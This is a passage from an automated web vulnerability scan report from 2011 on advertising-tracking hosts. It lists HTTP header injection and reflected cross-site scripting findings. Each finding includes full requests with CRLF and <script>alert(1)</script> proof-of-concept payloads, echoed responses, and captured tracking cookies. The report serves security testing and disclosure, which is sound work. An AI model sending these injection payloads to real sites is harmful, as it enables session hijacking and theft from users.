Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305554387|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 15:52:44 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 15:37:44 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560264|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; path=/; expires=Mon, 16-May-11 15:37:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955464^1304957264|88780
eb91e55787
^1304955464^1304957264; path=/; expires=Mon, 09-May-11 16:07:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; expires=Thu, 03-May-12 15:37:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde,cce56ea51bb938bc8d726cc79d6aee7f; expires=Thu, 03-May-12 15:37:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=; expires=Thu, 03-May-12 15:37:44 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|
...[SNIP]...

1.14. http://tracker.bidder7.mookie1.com/tr-goog [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tracker.bidder7.mookie1.com
Path:   /tr-goog

Issue detail

The value of the u request parameter is copied into the Location response header. The payload 6e5e5%0d%0a801dc7ecf54 was submitted in the u parameter. This caused a response containing an injected HTTP header.

Request

GET /tr-goog?a=4a155dda-808a-4648-a03d-f65de2ef0ada&b=1&c=10000205&p=TcgKZwADi9IK5X3Oj51wI1CQKxG3GyqHp1s3QA&u=6e5e5%0d%0a801dc7ecf54&z=-06:00&x=rtbbid2us2 HTTP/1.1
Host: tracker.bidder7.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:39:06 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://matcher.bidder7.mookie1.com/tracker?eid=google&id=6e5e5
801dc7ecf54

Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


2. Cross-site scripting (reflected)  previous  next
There are 162 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload d7ecd<script>alert(1)</script>81cab84367b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480d7ecd<script>alert(1)</script>81cab84367b&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480d7ecd<script>alert(1)</script>81cab84367b-SM=adver_05-09-2011-15-39-03; expires=Thu, 12-May-2011 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480d7ecd<script>alert(1)</script>81cab84367b-VT=adver_05-09-2011-15-39-03_2045387061304955543; expires=Sat, 07-May-2016 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480d7ecd<script>alert(1)</script>81cab84367b-nUID=adver_2045387061304955543; expires=Mon, 09-May-2011 15:54:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480d7ecd<script>alert(1)</script>81cab84367b';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='2045387061304955543';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='
...[SNIP]...

2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 58083<script>alert(1)</script>960a71f01f2 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver58083<script>alert(1)</script>960a71f01f2&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989ZZZZadver58083%3Cscript%3Ealert%281%29%3C%2Fscript%3E960a71f01f2_05-09-2011-15-39-03_5915877131304955543; expires=Sat, 07-May-2016 15:39:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10650526691304954989ZZZZadver58083%3Cscript%3Ealert%281%29%3C%2Fscript%3E960a71f01f2_5915877131304955543; expires=Mon, 09-May-2011 15:54:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver58083<script>alert(1)</script>960a71f01f2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='591587713130495
...[SNIP]...

2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6efef<script>alert(1)</script>ef0d23f8ba8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/6efef<script>alert(1)</script>ef0d23f8ba8&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:06 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-06_3915341321304955546; expires=Sat, 07-May-2016 15:39:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_3915341321304955546; expires=Mon, 09-May-2011 15:54:06 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='3915341321304955546';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/6efef<script>alert(1)</script>ef0d23f8ba8';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 83150<script>alert(1)</script>ef603f8fccd was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=83150<script>alert(1)</script>ef603f8fccd&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:04 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-04_17462808071304955544; expires=Sat, 07-May-2016 15:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_17462808071304955544; expires=Mon, 09-May-2011 15:54:04 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
72191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='17462808071304955544';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='83150<script>alert(1)</script>ef603f8fccd';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 4a309<script>alert(1)</script>ebde3e6b103 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=724a309<script>alert(1)</script>ebde3e6b103&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:04 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Wed, 08-Jun-2011 19:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-04_8048716101304955544; expires=Sat, 07-May-2016 15:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_8048716101304955544; expires=Mon, 09-May-2011 15:54:04 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8048716101304955544';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='724a309<script>alert(1)</script>ebde3e6b103';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 850d8<script>alert(1)</script>2b3d55e9cdd was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=850d8<script>alert(1)</script>2b3d55e9cdd&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-05_13016313581304955545; expires=Sat, 07-May-2016 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13016313581304955545; expires=Mon, 09-May-2011 15:54:05 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='13016313581304955545';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='850d8<script>alert(1)</script>2b3d55e9cdd';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 745f6<script>alert(1)</script>fac915db6fb was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480745f6<script>alert(1)</script>fac915db6fb&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
